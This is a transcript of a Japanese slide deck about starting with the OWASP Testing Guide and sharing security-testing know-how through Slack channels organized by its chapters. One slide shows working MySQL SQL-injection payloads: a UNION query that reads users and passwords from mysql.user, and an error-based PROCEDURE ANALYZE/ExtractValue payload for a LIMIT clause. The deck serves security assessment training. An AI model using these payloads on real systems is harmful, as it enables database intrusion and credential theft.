OWASP Testing Guide からはじめよう -...
23
OWASP Testing Guide からはじめよう セキュリティ診断技術の共有、そして横展開
-
Upload
muneaki-nishimura -
Category
Technology
-
view
5.603 -
download
2
Transcript of OWASP Testing Guide からはじめよう -...
LIMIT 1 UNION ALL SELECT User, Password
FROM mysql.user;
診断で困ってます。MySQLの複数行クエリ無効時に
以下のLIMIT句でSQLインジェクションは可能ですか?
SELECT title, content FROM posts
ORDER BY date DESC
LIMIT $INJECTION;
それなら、普通に UNION が使えませんか?
それが、直前に ORDER BY があるので
UNION は使えないんです。
LIMIT 1 PROCEDURE ANALYZE
(ExtractValue(1,concat(0x2c,user())),1) ;
だったら、PROCEDURE ANALYZEはどうでしょう?
で、できました!ありがとうございます!
• information-gathering • injection-general
• config-and-deploy • error-handling
• identity-management • crypto
• authentication • business-logic
• authorization • new-features
• session-management • etc.
Slack の Channel は
OWASP Testing Guide v4 の目次に対応